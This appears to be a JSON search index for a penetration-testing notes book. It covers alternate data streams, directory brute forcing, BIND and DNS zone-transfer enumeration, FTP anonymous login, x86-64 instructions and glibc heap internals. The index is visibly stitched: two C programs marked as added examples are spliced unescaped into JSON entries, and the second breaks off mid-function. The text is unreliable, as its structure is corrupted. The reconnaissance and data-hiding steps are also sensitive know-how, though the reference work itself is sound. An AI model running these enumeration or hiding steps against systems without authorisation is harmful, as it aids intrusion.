The default data stream is unnamed (it is addressed as file::$DATA) and any stream which does have a name is considered an alternate data stream.","breadcrumbs":"System Internals » Windows » File System » Alternate Data Streams (ADS)","id":"266","title":"Alternate Data Streams (ADS)"},"267":{"body":"ADSs cannot be manipulated via Windows Explorer and so the command line is needed. File operations with alternate data streams on the command line work the same, but you will need to use the filename:streamname format to refer to the stream you want to manipulate. For example, echo hello > file.txt\necho secret > file.txt:hidden Windows Explorer is completely oblivious to the alternate data stream. The command line, however, is not: Additionally, the dir /R command can be used to list alternate data streams for files in a directory: A more sophisticated tool for managing ADSs, called Streams, comes with the SysInternals suite. It can be used with the -s option to recursively show all streams for the files in a directory: The number next to the stream name is the size of the data stored in the stream. Streams can also be used to delete all streams from a file with the -d option:","breadcrumbs":"System Internals » Windows » File System » Working with ADSs","id":"267","title":"Working with ADSs"},"268":{"body":"","breadcrumbs":"Reverse Engineering » Reverse Engineering","id":"268","title":"Reverse Engineering"},"269":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » Program Anatomy","id":"269","title":"Program Anatomy"},"27":{"body":"This is the first step one needs to take after discovering a web application. The goal is to identify all publicly-accessible routes on the server such as files, directories and API endpoints. In order to do so, we can use various tools such as gobuster and feroxbuster. The technique works by taking common file and directory names from a wordlist and then querying the server for each of these routes. 
Depending on the response code the server returns, one can determine which routes are publicly accessible, which ones require some sort of authentication and which ones simply do not exist on the server. The basic syntax for feroxbuster is the following: feroxbuster -u -w The 200 (green) codes indicate a file or directory that is publicly accessible. The 300 (orange) codes represent a web page which redirects to another page. This may be because we are currently not authenticated as a user who can view said page. The 400 (red) codes represent client errors. More specifically, 404 means that the web page does not exist on the server and 403 means that the page does exist, but we are not allowed to access it. Note SecLists is a large collection of wordlists whose contents range from common URLs and file names to usernames and passwords. In contrast to other directory brute forcing tools, feroxbuster is recursive by default. If it finds a directory, it is going to begin brute forcing its contents as well. This is useful because it generates a comprehensive list of most, if not all, files and directories on the server. Nevertheless, this usually takes a lot of time. This behaviour can be disabled by using the --no-recursion flag. feroxbuster also supports appending filename extensions by using the -x command-line argument. This can come in handy, for example, when one has discovered the primary language / framework used on the server (PHP, ASPX, etc.).","breadcrumbs":"Reconnaissance » Enumeration » Web Server Enumeration (80, 443) » Directory Brute Force","id":"27","title":"Directory Brute Force"},"270":{"body":"The stack is a region of memory. It is used as a Last-In-First-Out (LIFO) data structure, meaning that the last element to be added will be the first to get removed. Each thread has its own stack, which is typically limited to a few megabytes (8 MiB by default on Linux). Adding data to the stack is called pushing onto the stack, whilst removing data is called popping off the stack. 
Although the location of the added or removed data is fixed (it is always to or from the top of the stack), existing data can still be read or written arbitrarily. A special register is used for keeping track of the top of the stack - the stack pointer, rsp. When pushing data, the stack pointer decreases, and when popping data, the stack pointer increases. This is because the stack grows from higher to lower memory addresses.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Stack » The Stack","id":"270","title":"The Stack"},"271":{"body":"When a function is invoked, a stack frame is constructed. First, the function's arguments which do not fit into the argument registers are pushed on the stack (under the System V AMD64 ABI the first six integer arguments travel in rdi, rsi, rdx, rcx, r8 and r9, so in the example below g and h are passed on the stack), then the return address is pushed by the call instruction. Following this, the value of a special register known as the base pointer (rbp) is saved onto the stack and the register is then updated to point to the location on the stack where the old base pointer was saved. From then on, the stack pointer is used for allocating local data inside the function and the base pointer is used for accessing this data. long func(long a, long b, long c, long d, long e, long f, long g, long h)\n{ long x = a * b * c * d * e * f * g * h; long y = a + b + c + d + e + f + g + h; long z = otherFunc(x, y); return z + 20;\n} Sometimes, the base pointer might be completely absent in optimised programs because compilers are good enough at keeping track of offsets directly from the stack pointer.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Stack » Stack Frames","id":"271","title":"Stack Frames"},"272":{"body":"Each program is comprised of a set of instructions which tell the CPU what operations it needs to perform. Different CPU architectures make use of different instruction sets; however, all of them boil down to two things - an operation code (opcode) and optional data (operands) that the instruction works with. 
These are all represented using bits - 1s and 0s.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » Instructions","id":"272","title":"Instructions"},"273":{"body":"Copies the value of the second operand (a register, memory location or immediate) into the first operand: mov rax, rdx","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » mov","id":"273","title":"mov"},"274":{"body":"Load effective address - this instruction calculates the address denoted by its second operand, without dereferencing memory, and stores it in its first operand: lea rdx, [rax+0x10] This will store the value rax+0x10 in rdx. Compilers also use it for plain arithmetic for this reason.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » lea","id":"274","title":"lea"},"275":{"body":"This instruction adds its operands and stores the result in its first operand: add rax, rdx","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » add","id":"275","title":"add"},"276":{"body":"This instruction subtracts the second operand from the first and stores the result in its first operand: sub rax, 0x9","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » sub","id":"276","title":"sub"},"277":{"body":"It XORs its operands and stores the result in the first operand: xor rdx, rax XOR-ing a register with itself (xor rax, rax) is the idiomatic way of zeroing it. The and and or instructions work the same way, but instead perform a binary AND and a binary OR operation, respectively.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » xor","id":"277","title":"xor"},"278":{"body":"Decreases the stack pointer (grows the stack) by 8 (4 on x86) bytes and stores the contents of its operand at the new top of the stack: push rax","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » push","id":"278","title":"push"},"279":{"body":"Loads the value at the top of the stack into its operand and then increases the stack pointer (shrinks the stack) by 8 (4 on x86) bytes: pop rax","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » pop","id":"279","title":"pop"},"28":{"body":"The BIND software is the most commonly used name server software, which 
supports CHAOSNET class queries. This can be used to query the name server for its software type and version. We are no longer querying the domain name system but are instead requesting information about the BIND instance. Our queries will still take the form of domain names - using .bind as the top-level domain. The results from such a query are returned as TXT records. Use the following syntax for querying BIND with the CHAOS class: dig @ ┌──(cr0mll@kali)-[~]-[]\n└─$ dig @192.168.129.138 chaos version.bind txt ; <<>> DiG 9.16.15-Debian <<>> @192.168.129.138 chaos version.bind txt\n; (1 server found)\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38138\n;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1\n;; WARNING: recursion requested but not available ;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;version.bind. CH TXT ;; ANSWER SECTION:\nversion.bind. 0 CH TXT \"9.8.1\" ;; AUTHORITY SECTION:\nversion.bind. 0 CH NS version.bind. ;; Query time: 0 msec\n;; SERVER: 192.168.129.138#53(192.168.129.138)\n;; WHEN: Tue Sep 14 16:24:35 EEST 2021\n;; MSG SIZE rcvd: 73 Looking at the answer section, we see that this name server is running BIND 9.8.1. Bear in mind that administrators can hide or fake this string with the version option in named.conf, so treat it as a hint rather than proof. Other CHAOS records you can request are hostname.bind, authors.bind, and server-id.bind.","breadcrumbs":"Reconnaissance » Enumeration » DNS Server Enumeration (53) » Enumerating BIND servers with CHAOS","id":"28","title":"Enumerating BIND servers with CHAOS"},"280":{"body":"Jumps to the address specified - used for redirecting code execution: jmp 0x6A2B10","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » jmp","id":"280","title":"jmp"},"281":{"body":"Used for invoking procedures. It pushes the return address (the address of the instruction following the call) onto the stack and then jumps to the specified address. 
After the function is finished, a ret instruction pops the return address off the stack and continues execution there. Saving and restoring the base pointer is not done by call and ret but by the function's prologue and epilogue (push rbp / pop rbp).","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » call","id":"281","title":"call"},"282":{"body":"It subtracts the second operand from the first, discards the result and sets the flags accordingly: cmp rax, rdx For an unsigned comparison: If rax < rdx, the zero flag is set to 0 and the carry flag is set to 1. If rax > rdx, the zero flag is set to 0 and the carry flag is set to 0. If rax = rdx, the zero flag is set to 1 and the carry flag is set to 0. Signed comparisons (jl, jg, etc.) use the sign and overflow flags instead of the carry flag.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » cmp","id":"282","title":"cmp"},"283":{"body":"jump-if-zero and jump-if-not-zero execute depending on the state of the zero flag.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » jz / jnz","id":"283","title":"jz / jnz"},"284":{"body":"The heap is a memory region which allows for dynamic allocation. Memory on the heap is allotted at runtime and programs are permitted to freely request additional heap memory whenever it is required. It is the program's job to release each allocation exactly once. Failure to do so can result in undefined behaviour. In C, heap memory is usually allocated through the use of malloc and whenever the program is finished with this data, the free function must be invoked in order to hand the area back to the allocator for reuse by later allocations. Heap memory can also be allocated by using malloc-compatible heap functions like calloc, realloc and memalign or in C++ using the corresponding new and new[] operators as well as their deallocation counterparts delete and delete[].","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » The Heap","id":"284","title":"The Heap"},"285":{"body":"Do not read or write to a pointer returned by malloc after that pointer has been passed to free. 
-> Can lead to use-after-free vulnerabilities.\nDo not use or leak uninitialised information in a heap allocation. -> Can lead to information leaks or uninitialised data vulnerabilities.\nDo not read or write bytes after the end of an allocation. -> Can lead to heap overflow and out-of-bounds read vulnerabilities.\nDo not pass a pointer that originated from malloc to free more than once. -> Can lead to double free vulnerabilities.\nDo not write bytes before the beginning of the allocation. -> Can lead to heap underflow vulnerabilities.\nDo not pass a pointer that did not originate from malloc to free. -> Can lead to invalid free vulnerabilities.\nDo not use a pointer returned by malloc before checking if the function returned NULL. -> Can lead to null-dereference bugs and sometimes arbitrary write vulnerabilities.\nThe implementation of the heap is platform specific.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Heap Rules","id":"285","title":"Heap Rules"},"286":{"body":"The heap grows from lower to higher addresses.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » The GLIBC Heap","id":"286","title":"The GLIBC Heap"},"287":{"body":"The heap manager allocates memory in so-called chunks. These chunks are stored adjacent to each other and must be 8-byte aligned on 32-bit systems and 16-byte aligned on 64-bit systems. In addition to this padding, each chunk contains metadata which provides information about the chunk itself. Consequently, a request for memory allocation on the heap actually consumes more bytes than originally requested. It is important to distinguish between in-use chunks and free (previously allocated) chunks, since they have different memory layouts. The following diagram outlines a chunk that is in use: The size field contains the chunk size in bytes. Since sizes are always a multiple of the alignment, the three lowest bits are free and carry specific meaning: A (0x04) - Non-main arena. 
If this bit is 0, the chunk belongs to the main arena and its main heap. If this bit is 1, the chunk belongs to a non-main (thread) arena, whose heap lives in mmap'd memory; because such heaps are aligned to a fixed size, the arena can be located from the chunk's address. M (0x02) - If this bit is set, then the chunk was mmap-ed directly and is not part of any heap. Typically used for large allocations. P (0x01) - If this bit is set, the previous chunk is in use. If it is clear, the previous chunk is free, the prev_size field at the very start of this chunk holds its size, and the two can be coalesced when this chunk is freed. A free chunk looks a bit different: The size and AMP fields carry the same meaning as those in chunks that are in use. Free chunks are organised in singly or doubly linked lists called bins. The fwd and bck pointers, which overlay the first bytes of what used to be the user data, are used to implement those linked lists. Different types of bins exist for different purposes. The chunk at the end of the heap is by convention called the top chunk.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Chunks","id":"287","title":"Chunks"},"288":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Memory Allocation on the Heap","id":"288","title":"Memory Allocation on the Heap"},"289":{"body":"When an application requests heap memory, the heap manager traverses the bins in search of a free chunk that is large enough to service the request. If such a chunk is found, it is removed from the bin, turned into an in-use chunk and a pointer to the user data section of the chunk is returned.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating from Free Chunks","id":"289","title":"Allocating from Free Chunks"},"29":{"body":"A zone transfer request provides the means for copying a DNS zone from one name server to another. This, however, only works over TCP. By doing this, you can obtain all the records of a DNS server for a particular zone. Properly configured servers restrict zone transfers to their secondary name servers, so a successful transfer from an arbitrary client is a misconfiguration worth reporting. 
This is done through the AXFR request type: dig @ AXFR ┌──(cr0mll0@kali)-[~]-[]\n└─$ dig @192.168.129.138 AXFR nsa.gov ; <<>> DiG 9.16.15-Debian <<>> @192.168.129.138 AXFR nsa.gov\n; (1 server found)\n;; global options: +cmd\nnsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600\nnsa.gov. 3600 IN NS ns1.nsa.gov.\nnsa.gov. 3600 IN NS ns2.nsa.gov.\nnsa.gov. 3600 IN MX 10 mail1.nsa.gov.\nnsa.gov. 3600 IN MX 20 mail2.nsa.gov.\nfedora.nsa.gov. 3600 IN TXT \"The black sparrow password\"\nfedora.nsa.gov. 3600 IN AAAA fd7f:bad6:99f2::1337\nfedora.nsa.gov. 3600 IN A 10.1.0.80\nfirewall.nsa.gov. 3600 IN A 10.1.0.105\nfw.nsa.gov. 3600 IN A 10.1.0.102\nmail1.nsa.gov. 3600 IN TXT \"v=spf1 a mx ip4:10.1.0.25 ~all\"\nmail1.nsa.gov. 3600 IN A 10.1.0.25\nmail2.nsa.gov. 3600 IN TXT \"v=spf1 a mx ip4:10.1.0.26 ~all\"\nmail2.nsa.gov. 3600 IN A 10.1.0.26\nns1.nsa.gov. 3600 IN A 10.1.0.50\nns2.nsa.gov. 3600 IN A 10.1.0.51\nprism.nsa.gov. 3600 IN A 172.16.40.1\nprism6.nsa.gov. 3600 IN AAAA ::1\nsigint.nsa.gov. 3600 IN A 10.1.0.101\nsnowden.nsa.gov. 3600 IN A 172.16.40.1\nvpn.nsa.gov. 3600 IN A 10.1.0.103\nweb.nsa.gov. 3600 IN CNAME fedora.nsa.gov.\nwebmail.nsa.gov. 3600 IN A 10.1.0.104\nwww.nsa.gov. 3600 IN CNAME fedora.nsa.gov.\nxkeyscore.nsa.gov. 3600 IN TXT \"knock twice to enter\"\nxkeyscore.nsa.gov. 3600 IN A 10.1.0.100\nnsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600\n;; Query time: 4 msec\n;; SERVER: 192.168.129.138#53(192.168.129.138)\n;; WHEN: Fri Sep 17 22:38:47 EEST 2021\n;; XFR size: 27 records (messages 1, bytes 709)","breadcrumbs":"Reconnaissance » Enumeration » DNS Server Enumeration (53) » DNS Zone Transfer","id":"29","title":"DNS Zone Transfer"},"290":{"body":"If no free chunk is found that can service the request, the heap manager must construct an entirely new chunk at the top of heap. 
To achieve this, it first needs to ascertain whether there is enough space at the top of the heap to hold the new chunk.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating from the Top Chunk","id":"290","title":"Allocating from the Top Chunk"},"291":{"body":"Once the free space at the top of the heap is used up, the heap manager will have to ask the kernel for additional memory. On the initial heap, the heap manager asks the kernel to allocate more memory at the end of the heap by calling sbrk. On most Linux-based systems this function internally uses a system call called brk. Eventually, the heap will grow to its maximum size, since expanding it any further would cause it to intrude on other sections of the process' address space. In this case, the heap manager will resort to using mmap to map new memory for heap expansions. If mmap also fails, then the process is unable to allocate more memory and malloc returns NULL.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Requesting Additional Memory at the Top of the Heap from the Kernel","id":"291","title":"Requesting Additional Memory at the Top of the Heap from the Kernel"},"292":{"body":"Large chunks get treated differently in their allocation. These are allocated off-heap through the direct use of mmap calls and this is reflected in the chunk's metadata by setting the M bit to 1. When such allocations are later returned to the heap manager via a call to free, the heap manager releases the entire mmap-ed region back to the system via munmap. Different platforms have different default thresholds for what counts as a large chunk and what doesn't; glibc's default is 128 KiB, and it is raised dynamically whenever an mmap-ed chunk is freed, so the same request size may be served from the heap later in the process' lifetime.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating Large Chunks","id":"292","title":"Allocating Large Chunks"},"293":{"body":"Multithreaded applications require that internal data structures on the heap are protected from race conditions. 
In the past, the heap manager availed itself of a global mutex before every heap operation; however, significant performance issues arose as a result. Consequently, the concept of \"arenas\" was introduced. Each arena manages its own heap memory, chunk allocation and bins. Although each arena still utilises a mutex for its internal operations, different threads can make use of different arenas to avoid having to wait for each other. The initial (main) arena consists of a single heap and, for single-threaded applications, it is the only arena that will ever exist. However, as more threads are spawned, new arenas are allocated and attached to them. Once all available arenas are being utilised by threads, the heap manager will commence creating new ones until a limit - 2 * Number of CPU cores for 32-bit and 8 * Number of CPU cores for 64-bit processes - is reached. Afterwards, multiple threads will be forced to share the same arena.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Arenas","id":"293","title":"Arenas"},"294":{"body":"Free chunks are organised in the so-called bins, which are essentially linked lists. For performance reasons different types of bins exist. There are 62 small bins, 63 large bins, 1 unsorted bin, 10 fast bins and 64 tcache bins per thread. The last two appeared later and are built on top of the first three. Pointers to the small, large, and unsorted bins are stored in the same array in the heap manager: BIN[0] -> invalid (unused)\nBIN[1] -> unsorted bin\nBIN[2] to BIN[63] -> small bins\nBIN[64] to BIN[126] -> large bins","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Bins","id":"294","title":"Bins"},"295":{"body":"There are 62 small bins and each of them stores chunks of a fixed size. Each chunk with a size less than 512 bytes on 32-bit systems and 1024 bytes on 64-bit systems has a corresponding small bin. 
Small bins are trivially sorted, since all of their elements have the same size, and insertion and removal of entries on these bins is incredibly fast.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Small Bins","id":"295","title":"Small Bins"},"296":{"body":"There are 63 large bins and they resemble small bins in their operation, but each of them stores chunks from a range of sizes. Consequently, insertion and removal of entries on these lists is slower, since the bin is kept sorted by size and has to be traversed in order to find the best-fitting chunk. A different number of bins is allocated to each chunk size range. The ranges start out 64 bytes wide - there are 32 bins, each of which shifts the range of chunk sizes it stores by 64 bytes from the previous bin. Following are 16 bins which shift the range by 512 bytes, and so on. In essence: Bin 1 -> stores chunks of sizes 512 - 568 bytes; Bin 2 -> stores chunks of sizes 576 - 632 bytes; ... In total there are: 32 bins spaced 64 bytes apart, 16 bins spaced 512 bytes apart, 8 bins spaced 4096 bytes apart, 4 bins spaced 32768 bytes apart, 2 bins spaced 262144 bytes apart and 1 bin for all remaining chunk sizes.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Large Bins","id":"296","title":"Large Bins"},"297":{"body":"There is a single unsorted bin. Freed chunks of small and large bin sizes (those not caught by the tcache or a fast bin) end up in this bin first, before being sorted into their small or large bin. The point of the unsorted bin is to speed up allocations by serving as a sort of cache. When malloc is invoked, it will first traverse this bin and see if it can immediately service the request. If not, it will move on to the small or large bins respectively, sorting the unsorted entries it passed over into their proper bins as it goes.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Unsorted Bins","id":"297","title":"Unsorted Bins"},"298":{"body":"Fast bins provide a further optimisation layer. Recently released small chunks are put in fast bins and are not initially merged with their neighbours. This allows for them to be repurposed forthwith, should a malloc request for that chunk size come very soon after the chunk's release. 
There are 10 fast bins, covering chunks of size 16, 24, 32, 40, 48, 56, 64, 72, 80, and 88 bytes plus chunk metadata. Fast bins are implemented as singly linked lists and insertions and removals of entries in them are really fast. Periodically, the heap manager consolidates the heap - chunks in the fast bins are merged with the abutting chunks and inserted into the unsorted bin. This consolidation occurs when a malloc request is issued for a size outside the small bin range (chunks of 512 bytes or more on 32-bit systems and 1024 bytes or more on 64-bit systems), when freeing a chunk larger than 64 KiB or when malloc_trim or mallopt is invoked.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Fast Bins","id":"298","title":"Fast Bins"},"299":{"body":"A new caching mechanism called tcache (thread local caching) was introduced in glibc version 2.26 back in 2017. The tcache stores bins of fixed size small chunks as singly linked lists. Similarly to a fast bin, chunks in tcache bins aren't merged with adjoining chunks. By default, there are 64 tcache bins, each containing a maximum of 7 same-sized chunks. The possible request sizes range from 12 to 516 bytes on 32-bit systems and from 24 to 1032 bytes on 64-bit systems. When a chunk is freed, the heap manager checks if the chunk fits into a tcache bin corresponding to that chunk size. If the tcache bin for this size is full or the chunk is simply too big to fit into a tcache bin, the heap manager obtains a lock on the arena and proceeds to comb through other bins in order to find a suitable one for the chunk. When malloc needs to service a request, it first checks the tcache for an available chunk of the requested size and, should such a chunk be found, malloc will return it without ever having to obtain a lock. If the chunk is too big for the tcache, malloc continues as before. A slightly different strategy is employed if the requested chunk size does have a corresponding tcache bin, but that bin is currently empty while matching chunks exist in the arena's other bins. 
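The bin boundaries described in the Bins, Small Bins, Large Bins, Fast Bins and tcache passages above can be reproduced exactly, because glibc computes them with a handful of macros. The following C program is an added example (not code from the page, and not glibc's own source): it transcribes the 64-bit arithmetic of the request2size, csize2tidx, fastbin_index, smallbin_index and largebin_index_64 macros from malloc.c so that any request size can be traced to its chunk size and to the bin that would serve it or receive it on free. The constants are the 64-bit defaults (SIZE_SZ 8, MALLOC_ALIGNMENT 16, no mallopt tuning) and are assumed rather than read from a running allocator.

```c
/* Added example, not code from the page or from glibc: 64-bit glibc bin
 * selection arithmetic, transcribed from the request2size, csize2tidx,
 * fastbin_index, smallbin_index and largebin_index_64 macros in malloc.c.
 * Assumed constants: SIZE_SZ 8, MALLOC_ALIGNMENT 16, default mallopt settings. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SIZE_SZ           8
#define MALLOC_ALIGNMENT  16
#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)
#define MINSIZE           32                         /* prev_size + size + fd + bk */
#define MAX_FAST_CHUNK    (64 * SIZE_SZ / 4)         /* 128: DEFAULT_MXFAST on 64-bit */
#define NSMALLBINS        64
#define MIN_LARGE_SIZE    (NSMALLBINS * MALLOC_ALIGNMENT)              /* 1024 */
#define TCACHE_MAX_BINS   64
#define MAX_TCACHE_CHUNK  ((TCACHE_MAX_BINS - 1) * MALLOC_ALIGNMENT + MINSIZE) /* 1040 */

/* User request -> chunk size: add the size field, round up to 16, never below MINSIZE. */
size_t request2size(size_t req) {
    if (req + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)
        return MINSIZE;
    return (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~(size_t)MALLOC_ALIGN_MASK;
}

/* tcache bin (0..63) for a chunk size, or -1 if the chunk is too big for the tcache. */
int tcache_index(size_t chunk) {
    if (chunk > MAX_TCACHE_CHUNK) return -1;
    return (int)((chunk - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT);
}

/* Fast bin for a chunk size, or -1 if above the default fast bin limit. */
int fastbin_index(size_t chunk) {
    if (chunk > MAX_FAST_CHUNK) return -1;
    return (int)((chunk >> 4) - 2);
}

/* Index into the arena's bins[] array: 1 is unsorted, 2..63 small, 64..126 large. */
int smallbin_index(size_t chunk) {
    if (chunk >= MIN_LARGE_SIZE) return -1;
    return (int)(chunk >> 4);
}

int largebin_index(size_t chunk) {
    if (chunk < MIN_LARGE_SIZE) return -1;
    if ((chunk >> 6)  <= 48) return 48  + (int)(chunk >> 6);   /* bins 64 B apart */
    if ((chunk >> 9)  <= 20) return 91  + (int)(chunk >> 9);   /* 512 B apart */
    if ((chunk >> 12) <= 10) return 110 + (int)(chunk >> 12);  /* 4 KiB apart */
    if ((chunk >> 15) <= 4)  return 119 + (int)(chunk >> 15);  /* 32 KiB apart */
    if ((chunk >> 18) <= 2)  return 124 + (int)(chunk >> 18);  /* 256 KiB apart */
    return 126;                                                /* everything larger */
}

/* Where free() parks a chunk of this request size first, following the order
 * in the deallocation procedure: tcache (if that bin has room), then fast bin,
 * otherwise the unsorted bin after coalescing. */
const char *free_destination(size_t req) {
    size_t chunk = request2size(req);
    if (tcache_index(chunk) >= 0)  return "tcache";
    if (fastbin_index(chunk) >= 0) return "fastbin";
    return "unsorted";
}

int main(void) {
    size_t requests[] = { 0, 24, 25, 100, 1000, 1032, 1033, 5000, 200000 };
    for (size_t i = 0; i < sizeof requests / sizeof requests[0]; i++) {
        size_t chunk = request2size(requests[i]);
        printf("malloc(%6zu): chunk %6zu  tcache %2d  fast %2d  small %2d  large %3d  free->%s\n",
               requests[i], chunk, tcache_index(chunk), fastbin_index(chunk),
               smallbin_index(chunk), largebin_index(chunk), free_destination(requests[i]));
    }
    return 0;
}
```

Note that the first large bin (index 64) starts exactly where the small bins end (chunk size 1024), which is why the "32 bins spaced 64 bytes apart" rule actually yields bins 64 through 96 before the 512-byte spacing takes over; the page's table counts are the conventional summary of the same macro.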
In that case, malloc obtains a lock and promotes as many heap chunks of the requested size as it can into the tcache, up to the tcache bin limit of 7. Subsequently, the last matching chunk is returned.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » TCache Bins","id":"299","title":"TCache Bins"},"3":{"body":"Any major changes outside of the eight category folders in the Notes/ directory are not permitted and will be rejected.","breadcrumbs":"Cyberclopaedia » Contributing » Out-of-Scope","id":"3","title":"Out-of-Scope"},"30":{"body":"The File Transfer Protocol (FTP) is a common protocol which you may find during a penetration test. It is a TCP-based protocol and its control channel runs on port 21. Luckily, its enumeration is simple and rather straight-forward. You can use the ftp command if you have credentials: ftp <host> You can then proceed with typical navigation commands like dir, cd, pwd, get and send to navigate and interact with the remote file system. If you don't have credentials you can try with the usernames guest, anonymous, or ftp and an empty password in order to test for anonymous login.","breadcrumbs":"Reconnaissance » Enumeration » FTP Enumeration (21) » Introduction","id":"30","title":"Introduction"},"300":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » malloc and free","id":"300","title":"malloc and free"},"301":{"body":"First, every allocation exists as a memory chunk which is aligned and contains metadata as well as the region the programmer wants. When a programmer requests memory from the heap, the heap manager first works out what chunk size the allocation request corresponds to, and then searches for the memory in the following order: If the size corresponds with a tcache bin and there is a tcache chunk available, return that immediately. If the request is huge, allocate a chunk off-heap via mmap. 
Otherwise obtain the arena heap lock and then perform the following steps, in order: Try the fastbin/smallbin recycling strategy If a corresponding fast bin exists, try and find a chunk from there (and also opportunistically prefill the tcache with entries from the fast bin). Otherwise, if a corresponding small bin exists, allocate from there (opportunistically prefilling the tcache as we go). Resolve all the deferred frees - Otherwise merge the entries in the fast bins and move their consolidated chunks to the unsorted bin. - Go through each entry in the unsorted bin. If it is suitable, return it. Otherwise, put the unsorted entry on its corresponding small/large bin as we go (possibly promoting small entries to the tcache). Default back to the basic recycling strategy If the chunk size corresponds with a large bin, search the corresponding large bin now. Create a new chunk from scratch Otherwise, there are no chunks available, so try and get a chunk from the top of the heap. If the top of the heap is not big enough, extend it using sbrk. If the top of the heap can’t be extended because we ran into something else in the address space, create a discontinuous extension using mmap and allocate from there If all else fails, return NULL.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocation","id":"301","title":"Allocation"},"302":{"body":"If the pointer is NULL, do nothing. Otherwise, convert the pointer back to a chunk by subtracting the size of the chunk metadata. Perform a few sanity checks on the chunk, and abort if the sanity checks fail. If the chunk fits into a tcache bin, store it there. If the chunk has the M bit set, give it back to the operating system via munmap. Otherwise we obtain the arena heap lock and then: If the chunk fits into a fastbin, put it on the corresponding fastbin. If the chunk size is greater than 64KB, consolidate the fastbins immediately and put the resulting merged chunks on the unsorted bin. 
Merge the chunk backwards and forwards with neighboring freed chunks in the small, large, and unsorted bins. If the resulting chunk lies at the top of the heap, merge it into the top chunk. Otherwise store it in the unsorted bin.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Deallocation","id":"302","title":"Deallocation"},"303":{"body":"Registers are value containers which reside on the CPU and not in RAM. They are small in size and some have special purposes. You may store both addresses and values in registers and depending on the instruction used the data inside will be interpreted in a different way - this is commonly called an addressing mode . In x86 Intel assembly (i386), the registers are 32 bits (4 bytes) in size and some of them are reserved: ebp - the base pointer, points to the bottom of the current stack frame esp - the stack pointer, points to the top of the current stack frame eip - the instruction pointer, points to the next instruction to be executed The other registers are general purpose registers and can be used for anything you like: eax, ebx, ecx, edx, esi, edi. x64 AMD assembly (amd64) extends these 32-bit registers to 64-bit ones and denotes these new versions by replacing the initial e with an r: rbp, rsp, rip, rax, ... It is important to note that these are not different registers - eax and rax refer to the same space on the CPU, however, eax only provides access to the lower 32 bits of the 64-bit register. You can also get access to the lower 16 and 8 bits of the register using different names: 8 Byte Register Lower 4 Bytes Lower 2 Bytes Lower Byte rbp ebp bp bpl rsp esp sp spl rip eip rax eax ax al rbx ebx bx bl rcx ecx cx cl rdx edx dx dl rsi esi si sil rdi edi di dil r8 r8d r8w r8b r9 r9d r9w r9b r10 r10d r10w r10b r11 r11d r11w r11b r12 r12d r12w r12b r13 r13d r13w r13b r14 r14d r14w r14b r15 r15d r15w r15b Each row contains names which refer to different parts of the same register. 
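The chunk layout, the A/M/P flag bits, the mmap path for large requests and the LIFO reuse of freed tcache chunks described in the heap passages above can all be observed from inside a process by reading the size field that sits immediately before each user pointer. The following C program is an added example, not code from the page, and assumes glibc malloc on 64-bit Linux; the PREV_INUSE, IS_MMAPPED and NON_MAIN_ARENA values mirror the glibc constants, and the mallopt(M_MMAP_THRESHOLD, ...) call pins the mmap threshold because glibc otherwise raises it after the first mmap-ed chunk is freed, which would make a repeated 1 MiB request come from the heap instead.

```c
/* Added example, not code from the page: inspect glibc chunk headers of live
 * allocations. Assumes glibc on 64-bit Linux (SIZE_SZ 8, 16-byte alignment). */
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#ifdef __GLIBC__
#include <malloc.h>     /* mallopt, M_MMAP_THRESHOLD */
#endif

#define PREV_INUSE      0x1   /* P: previous chunk in use, prev_size not valid */
#define IS_MMAPPED      0x2   /* M: chunk lives in its own mmap-ed region */
#define NON_MAIN_ARENA  0x4   /* A: chunk belongs to a secondary arena */
#define SIZE_BITS       (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

/* The size field is the 8 bytes right before the user pointer. */
static size_t raw_size_field(const void *user_ptr) {
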